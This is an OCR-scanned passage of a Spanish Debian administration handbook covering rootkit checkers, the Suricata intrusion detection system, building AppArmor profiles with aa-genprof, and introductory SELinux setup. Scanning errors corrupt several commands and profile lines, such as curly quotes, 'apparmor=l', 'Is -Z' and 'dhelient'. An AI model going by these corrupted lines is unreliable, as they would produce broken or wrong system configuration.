Los  paquetes  checksecurity  probaciones  basicas  en  el  sistema  (contrasenas  vacias,  nuevos  archivos  setuid,  etc.) 
y  chkrootkit/ rkhunter  Y  advierten  al  administrador  si  fuese  necesario.  A  pesar  de  su  nombre  explicito, 
un  administrador  no  deberia  confiar  exclusivamente  en  el  para  asegurarse  que  un 
sistema  Linux  es  seguro. 

Los  paquetes  chkrootkity  rkhunter  permiten  buscar  posibles  «rootkits»  instalados 
en  el  sistema.  Como  recordatorio,  estos  son  programas  designados  para  ocultar  que 
se  ha  comprometido  el  sistema  a  la  vez  que  se  mantiene  el  control  de  la  maquina. 
Las  comprobaciones  no  son  100%  confiables,  pero  generalmente  pueden  guiar  la 
atencion  del  administrador  a  problemas  potenciales. 


14.3.4.  Deteccion  de  intrusiones  (IDS/NIDS) 


VOLVER  A  LOS  CIMIENTOS  Un  ataque  de  «denegacion  de  servicio»  tiene  una  unica  finalidad:  hacer  que  un 

Denegacion  de  servicio  servicio  no  este  disponible.  El  resultado  es  el  mismo  independientemente  de  si  el 

ataque  implica  sobrecargar  al  servidor  mediante  consultas  o  si  se  aprovecha  algun 
fallo:  el  servicio  deja  de  estar  operativo.  Los  usuarios  habituales  no  estaran  conten- 
tos  y  la  entidad  que  alberga  la  red  a  la  que  se  dirige  el  ataque  sufre  una  perdida 
de  reputacion  (y  posiblemente  tambien  de  ingresos,  por  ejemplo  si  el  servicio  es  un 
sitio  de  comercio  electronico). 

Algunas  veces  estos  ataques  son  «distribuidos»;  esto  implica  habitualmente  sobre¬ 
cargar  al  servidor  con  una  gran  cantidad  de  consultas  provenientes  de  diferentes 
fuentes  para  que  el  servidor  no  sea  capaz  de  atender  las  consultas  legitimas.  Este 
tipo  de  ataques  se  han  hecho  merecedores  de  dos  acronimos  muy  conocidos:  DoS 
(denegacion  de  servicio:  «Denial  of  Service*)  y  DDoS  (denegacion  de  servicio  dis- 
tribuido:  «Distributed  Denial  of  Service*)  segun  si  el  ataque  es  distribuido  o  no. 
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suricata  (del  paquete  Debian  con  el  mismo  nombre)  es  un  NIDS  —  un  sistema  de  deteccion  de 
intrusiones  de  red  («Network  Intrusion  Detection  System»).  Su  funcion  es  escuchar  la  red  y  tra- 
tar  de  detectar  intentos  de  infiltracion  y/ o  actos  hostiles  (inclui'dos  ataques  de  denegacion  de 
servicio).  Todos  estos  eventos  son  registrados  en  varios  archivos  dentro  de  /va  r/log/su  ricata. 
Existen  utilidades  de  terceros  (Kibana/logstash)  para  poder  examinar  todos  los  datos  recogidos. 

http://suricata-ids.org 
+  https : //www. elastic . co/products/kibana 


PRECAUCION  La  efectividad  de  suricata  esta  limitada  por  el  trafico  que  ve  en  la  interfaz  de  red 

Rango  de  accion  monitorizada.  Obviamente  no  podra  detectar  nada  si  no  puede  observar  el  trafico 

real.  Cuando  se  encuentra  conectado  a  un  switch  de  red  solo  monitorizara  los  ata¬ 
ques  que  tengan  como  objetivo  a  la  maquina  en  la  que  esta  ejecutandose,  lo  que 
probablemente  no  sea  la  intencion.  Por  lo  tanto,  la  maquina  que  ejecute  suricata 
deberia  conectarse  a  un  puerto  «espejo»  del  switch,  que  habitualmente  se  utiliza 
para  encadenar  switches  y,  por  lo  tanto,  obtiene  todo  el  trafico. 


La  configuracion  de  Suricata  se  realiza  a  travse  del  archivo  /etc/suricata/su  ricata  -debian  . 
yaml,  que  es  muy  extenso,  puesto  que  cada  parametro  esta  descrito  ampliamente.  Como  mi'nimo 
se  requireconfigurar  el  rango  de  direcciones  de  la  red  local  (el  parametro  HOME_NET).  En  la 
practica  esto  quiere  decir  el  conjunto  de  todos  los  blancos  de  ataque  potenciales.  Pero  para  sacar 
el  mayor  partido  a  esta  utilidad,  se  deberia  leer  todo  el  archivo  y  adaptarlo  de  la  mejor  manera 
a  la  situacion  local. 

Igualmente,  se  deberia  configurar  /etc/def  ault/su  ricata  para  establecer  que  interfaz  de  red 
supervisar  y  para  activar  el  script  de  inicializacion  (estableciendo  RUN=yes).  Ademas  se  puede 
establecer  LISTENMODE=pcap,  porque  el  valor  predeterminado  (nfqueue)  no  funciona  sin  una 
configuracion  adicional  (el  cortafuegos  netfilter  debe  configurarse  mediante  el  destino  NFQU 
EUE  para  pasar  los  paquetes  a  un  archivo  de  cola  en  espacio  de  usuario  gestionado  por  suricata). 

suricata  detecta  comportamientos  anomalos  basandose  en  un  conjunto  de  reglas  de  supervi¬ 
sion.  Un  conjunto  de  estas  reglas  esta  disponible  en  el  paquete  snort-rules-default.  snort  es  la 
referencia  dentro  del  ecosistema  de  IDSs,  y  suricata  puede  reutilizar  las  reglas  escritas  para 
este  programa.  Desgraciadamente  este  paquete  no  esta  disponible  para  Debian  Jessie ,  y  se  pude 
obtener  de  otra  version  de  Debian,  como  la  version  de  pruebas  ( Testing )  o  la  inestable  (Unstable)”. 

Otra  posibilidad  es  utilizar  oinkmaster  (en  el  paquete  homonimo),  que  es  capaz  de  descargar 
conjuntos  de  relgas  de  Snort  desde  fuentes  externas. 


YENDOMAsallA  Prelude  permite  la  monitorizacion  centralizada  de  la  informacion  de  seguridad. 
Integracion  con  prelude  Su  arquitectura  modular  incluye  un  servidor  (el  gestor,  en  el  paquete  prelude- 

manager),  que  recoge  las  alertas  generadas  por  los  sensores  de  diferentes  tipos. 

Puede  configurar  Suricata  como  uno  de  estos  sensores.  Otra  posibilidad  es  prelude- 
Iml  ( lacayo  de  monitorizacion  de  registros:  «Log  Monitor  Lackey»),  que  monito- 
riza  los  archivos  de  registro  (de  forma  similar  a  como  lo  hace  logcheck,  descripto 
en  la  Seccion  14.3.1,  «Monitorizacion  de  los  registros  con  logcheck»  pagina  406). 
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14.4  Introduccion  a  AppArmor 


14.4.1.  Principios 

Apparmor  es  un  sistema  de  control  obligatorio  de  acceso  («Mandatory  Access  Control))  o  «MAC») 
basado  en  la  interfaz  LSM  ( modulos  de  seguridad  de  Linux:  «Linux  Security  Modules))).  En  la  prac- 
tica,  el  nucleo  pregunta  a  AppArmor  antes  de  cada  llamada  al  sistema  del  sistema  para  saber  si 
un  proceso  esta  autorizado  a  realizar  dicha  operacion.  A  traves  de  este  mecanismo,  Apparmor 
confina  un  programa  a  un  conjunto  limitado  de  recursos. 

AppArmor  aplica  un  conjunto  de  reglas  (un  «perfil»)  a  cada  programa.  El  perfil  aplicado  por  el 
nucleo  depende  de  la  ruta  de  instalacion  del  programa  a  ej  ecu  tar.  Al  contrario  que  en  SELinux 
(descrito  en  Seccion  14.5,  «Introduccion  a  SELinux»  pagina  420),  las  reglas  que  se  aplican  no  de- 
penden  del  usuario:  a  todos  los  usuarios  se  les  aplica  el  mismo  juego  de  reglas  cuando  ejecutan  el 
mismo  programa  (aunque  en  cualquer  caso  siguen  teniendose  en  cuenta  los  permisos  de  usuario 
tradicionales,  lo  que  puede  resultar  en  un  comportamiento  distinto). 

Los  perfiles  de  AppArmor  se  guardan  en  /etc/apparmor.d/  y  contienen  una  lista  de  reglas  de 
control  de  acceso  sobre  los  recursos  que  puede  utilizar  cada  programa.  Los  perfiles  se  compilan 
y  son  cargados  por  el  nucleo  por  la  orden  apparmor_parser.  Cada  perfil  se  puede  cargar  bien 
en  modo  estricto  ( enforcing )  o  bien  en  modo  relajado  ( complaining ).  El  modo  estricto  aplica  las 
reglas  y  registra  las  tentativas  de  violacion,  mientras  que  en  el  modo  relajado  solo  se  registran 
las  llamadas  al  sistema  que  hubieran  sido  bloqueadas,  pero  no  se  bloquean  realmente. 


14.4.2.  Activar  AppArmour  y  gestionar  los  perfiles 

El  soporte  de  AppArmor  esta  ya  integrado  en  los  nucleos  estandar  proporcionados  por  Debian. 
Para  activar  AppArmor  basta  con  instalar  algunos  paquetes  adicionales  y  establecer  algun  para- 
metro  en  la  linea  de  ordenes  del  nucleo: 

#  apt  install  apparmor  apparmor-profiles  apparmor-utils 
[■■■] 

#  perl  -pi  -e  's,GRUB_CMDLINE_LINUX="( .*)"$, GRUB_CMDLINE_LINUX=”$1  apparmor=l 

security=apparmor", '  /etc/default/grub 

#  update-grub 

Despues  de  un  reinicio  AppArmor  estara  operativo,  lo  cual  se  puede  confirmar  mediante  aa  - 
status: 

#  aa-status 

apparmor  module  is  loaded. 

44  profiles  are  loaded. 

9  profiles  are  in  enforce  mode. 

/us r/bin/lxc- start 

/usr/lib/chromium-browser/chromium-browser//browser  java 

[...] 

35  profiles  are  in  complain  mode. 
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/sbin/klogd 

[...] 

3  processes  have  profiles  defined. 

1  processes  are  in  enforce  mode. 

/usr/sbin/libvirtd  (1295) 

2  processes  are  in  complain  mode. 

/usr/sbin/avahi-daemon  (941) 

/usr/sbin/avahi-daemon  (1000) 

0  processes  are  unconfined  but  have  a  profile  defined. 


NOTA 

Otros  perfiles  de 
AppArmor 


El  paquete  apparmor-profiles  contiene  pefiles  desarrollados  por  la  comunidad 
de  origen  de  AppArmor.  Para  obtener  mas  pefiles  es  posible  instalar  apparmor- 
profiles-extra,  que  contiene  perfiles  adicionales  desarrollados  por  Ubuntu  y  De- 
bian. 


El  estado  de  cada  perfil  se  puede  cambair  entre  los  modos  estricto  y  relajado  mediante  las  orde- 
nes  aa-enforceyaa-complain,  pasandoles  como  parametro  bien  la  ruta  del  ej  ecu  table  o  la  ruta 
del  archivo  de  perfil.  De  igual  manera  se  puede  desactivar  completamente  un  perfil  mediante 
aa  -disable,  o  establecerlo  en  el  modo  de  auditoria  (de  forma  que  registre  incluso  las  llamadas 
del  sistema  aceptadas)  mediante  aa- audit. 

#  aa-enforce  /usr/sbin/avahi-daemon 

Setting  /usr/sbin/avahi-daemon  to  enforce  mode. 

#  aa-complain  /etc/apparmor.d/usr.bin.lxc-start 

Setting  /etc/apparmor . d/us r . bin . Ixc-start  to  complain  mode. 


14.4.3.  Creadon  de  un  nuevo  perfil 

A  pesar  de  que  crear  un  perfil  AppArmor  es  bastante  sencillo,  la  mayori'a  de  los  programas  no 
disponen  de  uno.  Esta  seccion  muestra  como  crear  un  nuevo  perfil  desde  cero,  simplemente 
utilizando  el  programa  deseado  y  dejando  que  AppArmor  monitorice  las  llamadas  al  sistema 
que  realiza  y  los  recursos  a  los  que  accede. 

Los  programas  que  deben  ser  confinados  de  forma  prioritaria  son  aquellos  expuestos  a  la  red, 
puesto  que  estos  seran  los  blancos  mas  probables  para  atacantes  remotos.  Precisamente  por  eso 
AppArmor  proporciona  la  orden  aa  -  un  confined,  que  lista  los  programas  que  exponen  al  menos 
un  zocalo  de  red  (NT:  ^mejor  puerto  de  red?)  sin  tener  ningun  perfil  asociado.  Con  la  opcion  — 
paranoid  se  obtienen  todos  los  procesos  que  tienen  activa  al  menos  una  conexion  de  red  y  no 
estan  confinados. 

#  aa-unconfined 

801  /sbin/dhclient  not  confined 
890  /sbin/rpcbind  not  confined 
899  /sbin/rpc . statd  not  confined 
929  /usr/sbin/sshd  not  confined 

941  /usr/sbin/avahi-daemon  confined  by  '/usr/sbin/avahi-daemon  (complain)' 
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988  /usr/sbin/minissdpd  not  confined 

1276  /us r/sbin/exim4  not  confined 

1485  /usr/lib/erlang/erts-6.2/bin/epmd  not  confined 

1751  /us r/lib/erlang/erts-6 . 2/bin/beam . smp  not  confined 

19592  /usr/lib/dleyna- renderer/dleyna- renderer-service  not  confined 

El  el  ejemplo  siguiente  vamos  a  intentar  crear  un  perfil  para  /sbin/dhclient.  Para  ello  utilza- 
mos  la  orden  aa-genprof  dhclient,  que  nos  invita  a  utilizar  la  aplicacion  (en  otra  ventana) 
y  a  volver  a  aa-genprof  una  vez  que  hayamos  terminado,  para  escrutar  los  registros  en  bus- 
ca  de  eventos  AppArmor  y  convertir  estos  registros  en  reglas  de  control  de  acceso.  Para  cada 
evento  registrado  se  proponen  una  o  varias  sugerencias  de  reglas  y  sera  posible  aprobarlas  o 
modificarlas  de  distintas  formas: 

#  aa-genprof  dhclient 

Writing  updated  profile  for  /sbin/dhclient. 

Setting  /sbin/dhclient  to  complain  mode. 

Before  you  begin,  you  may  wish  to  check  if  a 
profile  already  exists  for  the  application  you 
wish  to  confine.  See  the  following  wiki  page  for 
more  information: 

http : //wiki . apparmor . net /index . php/Prof iles 

Please  start  the  application  to  be  profiled  in 
another  window  and  exercise  its  functionality  now. 

Once  completed,  select  the  "Scan"  option  below  in 
order  to  scan  the  system  logs  for  AppArmor  events. 

For  each  AppArmor  event,  you  will  be  given  the 
opportunity  to  choose  whether  the  access  should  be 
allowed  or  denied. 

Profiling:  /sbin/dhclient 

[(S)can  system  log  for  AppArmor  events]  /  (F)inish 
Reading  log  entries  from  /var/log/audit/audit . log . 

Profile:  /sbin/dhclient  © 

Execute :  /usr/lib/NetworkManager/nm-dhcp- helper 
Severity:  unknown 

(I)nherit  /  (C)hild  /  (P)rofile  /  (N)amed  /  (U)nconfined  /  (X)  ix  On  /  (D)eny  /  Abo(r 
)t  /  (F)inish 

P 

Should  AppArmor  sanitise  the  environment  when 
switching  profiles? 

Sanitising  environment  is  more  secure, 
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but  some  applications  depend  on  the  presence 
of  LD  PRELOAD  or  LD  LIBRARY  PATH. 

(Y)es  /  [ ( N ) o ] 

Y 

Writing  updated  profile  for  /usr/lib/NetworkManager/nm-dhcp-helper. 

Complain-mode  changes: 

WARN:  unknown  capability:  CAPnetraw 

Profile:  /sbin/dhclient  o 

Capability:  netraw 
Severity:  unknown 

[(A)llow]  /  (D)eny  /  (I)gnore  /  Audi(t)  /  Abo(r)t  /  (F)inish 

A 

Adding  capability  netraw  to  profile. 

Profile:  /sbin/dhclient  © 

Path:  /etc/nsswitch . conf 

Mode:  r 

Severity:  unknown 

1  -  #include  <abstractions/apache2-common> 

2  -  #include  <abstractions/libvirt-qemu> 

3  -  #include  <abst ractions/nameservice> 

4  -  #include  <abst ractions/totem> 

[5  -  /etc/nsswitch . conf ] 

[(A)llow]  /  (D)eny  /  (I)gnore  /  (G)lob  /  Glob  with  (E)xtension  /  (N)ew  /  Abo(r)t  /  (F 
)inish  /  (M)ore 

3 

Profile:  /sbin/dhclient 
Path:  /etc/nsswitch . conf 

Mode:  r 

Severity:  unknown 

1  -  #include  <abstractions/apache2-common> 

2  -  #include  <abstractions/libvirt-qemu> 

[3  -  #include  <abst ractions/nameservice>] 

4  -  #include  <abst ractions/totem> 

5  -  /etc/nsswitch . conf 

[(A)llow]  /  (D)eny  /  (I)gnore  /  (G)lob  /  Glob  with  (E)xtension  /  (N)ew  /  Abo(r)t  /  (F 
)inish  /  (M)ore 

A 

Adding  #include  <abst ractions/nameservice>  to  profile. 

Profile:  /sbin/dhclient 
Path:  /proc/7252/net/dev 

Mode:  r 
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Severity:  6 


1  -  /proc/7252/net/dev 
[2  -  /proc/*/net/dev] 

[(A)llow]  /  (D)eny  /  (I)gnore  /  (G)lob  /  Glob  with  (E)xtension  /  (N)ew  /  Abo(r)t  /  (F 
)inish  /  (M)ore 

A 

Adding  /proc/*/net/dev  r  to  profile 

[...] 

Profile:  /sbin/dhclient  O 
Path:  /run/dhclient-ethO . pid 

Mode:  w 

Severity:  unknown 

[1  -  /run/dhclient-ethO . pid] 

[(A)llow]  /  (D)eny  /  (I)gnore  /  (G)lob  /  Glob  with  (E)xtension  /  (N)ew  /  Abo(r)t  /  (F 
)inish  /  (M)ore 

N 

Enter  new  path:  /run/dhclient* . pid 

Profile:  /sbin/dhclient 
Path:  /run/dhclient-ethO . pid 

Mode:  w 

Severity:  unknown 

1  -  /run/dhclient-ethO . pid 
[2  -  /run/dhclient* . pid] 

[(A)llow]  /  (D)eny  /  (I)gnore  /  (G)lob  /  Glob  with  (E)xtension  /  (N)ew  /  Abo(r)t  /  (F 
)inish  /  (M)ore 

A 

Adding  /run/dhclient* . pid  w  to  profile 

[■■■] 

Profile:  /usr/lib/NetworkManager/nm-dhcp-helper  © 

Path:  /proc/f ilesystems 

Mode:  r 

Severity:  6 

[1  -  /proc/filesystems] 

[(A)llow]  /  (D)eny  /  (I)gnore  /  (G)lob  /  Glob  with  (E)xtension  /  (N)ew  /  Abo(r)t  /  (F 
)inish  /  (M)ore 

A 

Adding  /proc/filesystems  r  to  profile 
=  Changed  Local  Profiles  = 

The  following  local  profiles  were  changed.  Would  you  like  to  save  them? 
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[1  -  /sbin/dhclient ] 

2  -  /usr/lib/NetworkManager/nm-dhcp-helper 

(S)ave  Changes  /  Save  Selec(t)ed  Profile  /  [(V)iew  Changes]  /  View  Changes  b/w  (C) 
lean  profiles  /  Abo(r)t 

S 

Writing  updated  profile  for  /sbin/dhclient. 

Writing  updated  profile  for  /usr/lib/NetworkManager/nm-dhcp-helper. 

Profiling:  /sbin/dhclient 

[(S)can  system  log  for  AppArmor  events]  /  (F)inish 

F 

Setting  /sbin/dhclient  to  enforce  mode. 

Setting  /usr/lib/NetworkManager/nm-dhcp-helper  to  enforce  mode. 

Reloaded  AppArmor  profiles  in  enforce  mode. 

Please  consider  contributing  your  new  profile! 

See  the  following  wiki  page  for  more  information: 

http : //wiki . apparmor . net /index . php/Prof iles 

Finished  generating  profile  for  /sbin/dhclient. 

Tenga  en  cuenta  que  el  programa  no  muestra  los  caracteres  de  control  que  Vd.  teclea;  los  hemos 

incluido  en  la  transcripcion  anterior  para  aclarar  las  elecciones  realizadas  en  cada  paso. 

O  El  primer  evento  detectado  es  la  ejecucion  de  otro  programa.  En  este  caso  se  ofrecen  va- 
rias  opciones:  se  puede  lanzar  el  programa  con  el  perfil  del  programa  padre  (inherit),  con 
un  perfil  dedicado  ( Profile  o  Name,  que  solo  se  diferencian  por  la  posibilidad  de  elegir  un 
nombre  de  perfil  arbitrario),  con  un  sub-perfil  del  proceso  padre  (Child),  o  bien  se  puede 
lanzar  sin  nigun  perfil  (Unconfined).  Tambien  se  puede  impedir  que  el  programa  se  ejecute 
(Deny). 

Cuando  se  elije  lanzar  el  proceso  hijo  con  un  perfil  de  dedicado  que  no  exista  aun,  la  he- 
rramienta  creara  el  perfil  que  falta  y  propondra  sugerencias  de  reglas  en  la  misma  sesion 
de  trabajo. 

©  A  nivel  del  nucelo,  los  permisos  especiales  del  usuario  root  se  han  separado  en  ’’capacida- 
des”  («capabilities»).  Cuando  una  llamada  del  sistema  requiere  una  capacidad  especffica, 
AppArmor  verifica  que  el  perfil  permite  al  programa  utilizar  esta  capacidad. 

©  Aqui  el  programa  requiere  el  permiso  de  lectura  sobre  el  archivo  /etc/nsswitch  .  conf. 
aa-genprof  ha  detectado  que  este  permiso  ya  se  habia  concedido  por  varias  «abstraccio- 
nes»  y  las  ofrece  como  alternativas  posibles.  Una  abstraccion  proporciona  un  conjunto 
reutilizable  de  reglas  de  control  de  acceso,  agrupando  reglas  que  duelen  utilizarse  con- 
juntamente.  En  este  caso  especifico  el  archivo  se  utiliza  normalmente  por  las  funciones 
relativas  a  la  resolucion  de  nombres  de  la  biblioteca  estandar  C,  y  por  lo  tanto  elegimos  la 
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opcion  «3»  para  incluir  la  opcion  «#include  <abstractions/nameservice>  »  y  despues  «A» 
para  autorizarlo. 

O  El  programa  intenta  crear  el  archivo  /run/dhclient-ethO.pid.  Si  autorizamos  unica- 
mente  la  creacion  de  este  archivo,  el  programa  no  funcionara  si  el  usuario  intenta  utili- 
zarlo  en  otra  interfaz  de  red.  Por  lo  tanto  habra  que  selecionar  «New»  para  reemplazar  el 
nombre  del  archivo  por  un  nombre  mas  generico,  «  /run/dhclient*.pid  »,  antes  de  guar- 
dar  la  regia  con  «Allow». 

©  Hay  que  tener  en  cuenta  que  este  intento  de  acceso  no  forma  parte  del  perfil  dh- 
client,  sino  del  nuevo  perfil  que  hemos  creado  cuando  hemos  autorizado  a  /us r/ lib/ 
NetworkManager/nm-d hep  -  helper  para  que  funcione  bajo  el  suyo  propio. 

Despues  de  examinar  todos  los  eventos  registrados,  el  programa  propone  guardar  todos 
los  perfiles  que  se  han  creado  durante  la  ejecucion.  En  este  caso  tenemos  dos  perfiles  que 
guardamos  simultaneamente  mediante  «Save»  antes  de  cerrar  el  programa  con  «Finish» 
(pero  podriamos  igualmente  haberlos  guardados  individualmente). 

aa-genprof  no  es  sino  un  pequeno  script  inteligente  que  utiliza  aa-logprof:  crea  un  perfil 
vacio,  lo  carga  en  modo  relajado y  despues  ejecuta  aa-logprof.  Esta  ultima  es  una utilidad  que 
actualiza  un  perfil  en  funcion  de  las  violaciones  que  han  sido  registradas.  Por  lo  tanto  se  puede 
volver  a  ejecutar  esta  herramienta  para  mejorar  el  perfil  que  se  ha  creado. 

Si  se  quiere  que  el  perfil  generado  sea  completo,  se  deberia  utilizar  el  programa  de  todas  las 
formas  legitimas  posibles.  En  el  caso  de  dhcliente  esto  significa  ejecutarlo  a  traves  de  Net¬ 
work  Manager,  pero  tambien  mediante  ifupdown,  a  mano,  etc.  Finalmente  se  obtendra  un 
/etc/apparmor.d/sbin  .dhclient  parecido  al  siguiente: 

#  Last  Modified:  Tue  Sep  8  21:40:02  2015 
#include  <tunables/global> 

/sbin/dhelient  { 

#include  <abstractions/base> 

#in elude  <abst  ractions/nameservice> 

capability  netbind  service, 
capability  netraw, 

/bin/dash  r, 

/etc/dhcp/*  r, 

/etc/dhcp/dhclient -enter- hooks . d/*  r, 

/etc/dhcp/dhclient -  exit -hooks .d/*  r, 

/etc/resolv.conf .*  w, 

/etc/samba/dhcp . conf . *  w, 

/proc/*/net/dev  r, 

/proc/filesystems  r, 

/run/dhelient* . pid  w, 

/sbin/dhelient  mr, 

/sbin/dhclient-script  rCx, 
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/us r/lib/NetworkManager/nm-d hep- helper  Px, 
/var/lib/NetworkManager/*  r, 
/var/lib/NetworkManager/* . lease  rw, 
/var/lib/dhep/* . leases  rw, 

profile  /sbin/dhclient-script  flags=(complain)  { 
#include  <abstractions/base> 

#include  <abstractions/bash> 

/bin/dash  rix, 

/etc/dhcp/dhclient- enter -hooks .  d/*  r, 
/etc/dhcp/dhclient-exit-hooks .d/*  r, 
/sbin/dhclient-script  r, 


} 

} 


14.5  Introduccion  a  SELinux 


14.5.1.  Principios 


SELinux  ( Linux  con  seguridad  mejorada:  «Security  Enhanced  Linux»)  es  un  sistema  de  control  obli- 
gatorio  de  acceso  («Mandatory  Access  Control»)  basado  en  la  interfaz  LSM  ( modulos  de  seguridad 
de  Linux:  «Linux  Security  Modules»).  En  la  practica,  el  nucleo  pregunta  a  SELinux  antes  de  cada 
llamada  al  sistema  para  saber  si  un  proceso  esta  autorizado  a  realizar  dicha  operacion. 

SELinux  utiliza  una  serie  de  reglas  —  conocidas  en  conjunto  como  una  politica  («policy»)  —  para 
autorizar  o  denegar  operaciones.  Estas  reglas  son  dificiles  de  crear.  Afortunadamente  se  pro- 
porcionan  dos  politicas  estandar  ( targeted ,  dirigida,  y  strict,  estricta)  para  evitar  gran  parte  del 
trabajo  de  configuracion. 

Con  SELinux,  la  gestion  de  permisos  es  completamente  distinta  a  la  de  los  sistemas  Unix  tradicio- 
nales.  Los  permisos  de  un  proceso  dependen  de  su  contexto  de  seguridad.  El  contexto  esta  definido 
por  la  identidad  del  usuario  que  lanza  el  proceso  y  el  rol  y  el  dominio  que  el  usuario  tenia  en  ese 
momento.  Los  permisos  realmente  dependen  del  dominio,  pero  los  roles  controlan  la  transicion 
entre  dominios.  Por  ultimo,  las  transiciones  posibles  entre  roles  dependen  de  la  identidad. 
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Figura  14.3  Contextos  de  seguridad  y  usuarios  Unix 


En  la  practica,  a  un  usuario  se  le  asigna  un  contexto  de  seguridad  predeterminado  al  iniciar  se- 
sion  (dependiendo  de  los  roles  que  pueda  adoptar).  Esto  define  el  dominio  actual  y,  por  lo  tanto, 
el  dominio  de  todos  los  procesos  hijos  que  lance.  Si  desea  cambiar  el  rol  actual  y  su  dominio 
asociado,  debe  ejecutar  new  role  -r  rol_r  -t  dominio_t  (habitualmente  se  permite  un  uni- 
co  dominio  para  un  rol  determinado  por  lo  que  puede  omitir  el  parametro  -t).  Este  programa  lo 
autenticara  pidiendole  que  ingrese  su  contrasena.  Esta  caracteristica  impide  que  los  programas 
cambien  de  rol  de  forma  automatica.  Estos  cambios  solo  pueden  ocurrir  si  se  permiten  explici- 
tamente  en  la  politica  de  seguridad  de  SELinux. 

Obviamente  los  permisos  no  se  aplican  a  todos  los  objetos  (archivos,  directories,  zoealos,  disposi- 
tivos,  etc.).  Pueden  variar  de  objeto  a  objeto.  Para  conseguir  esto,  cada  objeto  esta  asociado  a  un 
tipo  (esta  operacion  se  conoce  como  etiquetado).  Por  ello  se  expresan  los  permisos  de  los  domi- 
nios  como  conjuntos  de  operaciones  permitidas  o  denegadas  sobre  estos  tipos  (e  indirectamente 
sobre  todos  los  objetos  que  estan  etiquetados  con  dicho  tipo). 


EXTRA  Internamente  un  dominio  es  simplemente  un  tipo,  pero  un  tipo  que  solo  se  aplica 

Los  dominios  y  los  tipos  a  Procesos-  Es  Por  esta  razon  que  los  dominios  tienen  el  sufijo  t  al  igual  que  los 

son  equivalentes  tipos  de  objeto. 


De  forma  predeterminada,  los  programas  heredan  el  dominio  del  usuario  que  los  ejecuta,  pero 
las  politicas  estandar  de  SELinux  esperan  que  muchos  programas  importantes  se  ejecuten  en 
dominios  dedicados.  Para  conseguir  esto,  se  etiquetan  dichos  ejecutables  con  un  tipo  dedicado 
(por  ejemplo,  se  etiqueta  ssh  con  ssh_exec_t  y,  cuando  inicia  el  programa,  automaticamente 
cambia  al  dominio  ssh_t).  Este  mecanismo  de  transicion  automatica  de  dominios  permite  otor- 
gar  exclusivamente  los  permisos  que  requiere  cada  programa.  Es  un  principio  fundamental  de 
SELinux. 
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Procesos  Objetos  y 

y  dominios  typos 


Figura  14.4  Transiciones  automaticas  entre  dominios 


EN  LA  prActica  Para  averiguar  el  contexto  de  seguridad  de  un  proceso,  debe  utilizar  la  opcion  Z  de 

Averiguar  el  contexto  de  Ps 

seguridad  $  ps  axZ  ^ 

grep  vstfpd 

system _u : systemr: ftpdt : s0  2094  ?  Ss  0:00  /usr/sbin/ 

**■  vsftpd 

El  primer  campo  contiene  la  identidad,  el  rol,  el  dominio  y  el  nivel  MCS  separa- 
dos  por  dos  puntos.  El  nivel  MCS  ( seguridad  multicategoria:  «Multi-Category  Se- 
curity»)  es  un  parametro  que  interviene  en  el  establecimiento  de  una  politica  de 
proteccion  de  la  confidencialidad,  que  regula  el  acceso  a  archivos  basandose  en  su 
sensibilidad.  No  explicaremos  esta  caracteristica  en  este  libro. 

Para  averiguar  el  contexto  de  seguridad  em  una  consola,  puede  ejecutar  id  -Z. 

$  id  -Z 

unconf ined  u :  unconf ined  r : unconf inedt : S0-S0 : c0 . cl023 

Por  ultimo,  para  averiguar  el  tipo  asignado  a  un  archivo,  puede  utilizar  Is  -Z. 

$  Is  -Z  test  /usr/bin/ssh 

unconf ined  u : obj ect  r: user  horne  t : s0  test 

systemu : object  r: ssh  exect : s0  /usr/bin/ssh 

Es  importante  saber  que  la  identidad  y  rol  asignados  a  un  archivo  no  tienen  impor- 
tancia  especial  (nunca  son  utilizados),  pero  se  le  asigna  un  contexto  de  seguridad 
completo  a  todos  los  objetos  para  mantener  la  uniformidad. 


14.5.2.  Configuracion  de  SELinux 

Todos  los  nucleos  estandar  que  Debian  proporciona  incluyen  compatibilidad  con  SELinux.  Todas 
las  herramientas  basicas  Unix  son  compatibles  con  SELinux  sin  ninguna  modificacion.  Por  lo 
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tanto,  es  relativamente  sencillo  habilitar  SELinux. 

Laordenapt  install  selinux-basics  selinux-policy-default  instalara  automaticamen- 
te  todos  los  paquetes  necesarios  para  configurar  un  sistema  SELinux. 


PRECAUCION  Desgraciadamente,  los  mantenedores  del  paquete  fuente  refpolicy  no  soluciona- 
Politica  de  referencia  ron  a  t'emP°  l°s  fallos  criticos  y  por  la  tanto  tuvo  que  ser  suprimido  en  Jessie.  En  la 
ausente  en  Jessie  practica,  esto  significa  que  los  paquetes  selinux-policy-*  no  estan  disponibles  en 
Jessie  y  tienen  que  obtenerse  de  alguna  otra  distribucion.  Es  de  esperar  que  vuelvan 
a  estar  disponibles  en  una  version  de  arreglo  de  fallos  (version  menor/point  relea¬ 
se)  o  mediante  las  retroadaptaciones.  Mientras  tanto  se  pueden  descargar  desde 
Unstable. 

Esta  situacion  desgraciada  muestra  al  menos  que  SELinux  no  es  demasiado  popu¬ 
lar  entre  los  usuarios  y  desarrolladores  que  utilizan  las  versiones  de  desarrollo  de 
Debian.  Por  lo  tanto,  si  se  opta  por  utilizar  SELinux,  puede  ser  necesario  invertir 
bastante  tiempo  para  adaptarlo  a  las  necesidades  especificas  que  se  tengan. 


El  paquete  selinux-policy-default  contiene  un  conjunto  de  reglas  estandar.  De  forma  predetermi- 
nada,  esta  poli'tica  solo  restringe  el  acceso  a  algunos  servicios  expuestos  ampliamente.  Las  se- 
siones  de  usuario  no  estan  restringidas  y,  por  lo  tanto,  es  improbable  que  SELinux  bloquee  una 
operacion  legitima  de  un  usuario.  Sin  embargo,  mejora  la  seguridad  de  los  servicios  del  siste¬ 
ma  que  esten  ejecutando  en  la  maquina.  Para  establecer  una  poli'tica  equivalente  a  las  reglas 
«estrictas»  antiguas  debe  deshabilitar  el  modulo  unconfined  (detallamos  la  gestion  de  modulos 
mas  adelante  en  esta  seccion). 

Despues  de  instalar  una  poli'tica,  debe  etiquetar  todos  los  archivos  disponibles  (lo  que  quiere 
decir  asignarles  un  tipo).  Debe  iniciar  esta  operacion  manualmente  con  fixf  iles  relabel. 

Ah  ora  el  sistema  SELinux  esta  listo.  Para  habilitarlo  debe  anadir  el  parametro  sel  i  nux= J  secu  rity = 
selinux  al  nucleo  Linux.  El  parametro  audit=l  habilita  los  registros  de  SELinux  que  graban  todas 
las  operaciones  denegadas.  Por  ultimo,  el  parametro  enforcing=l  hace  que  se  apliquen  las  reglas: 
sin  el,  SELinux  trabaja  en  el  modo  predeterminado  permissive  (permisivo)  en  el  que  las  acciones 
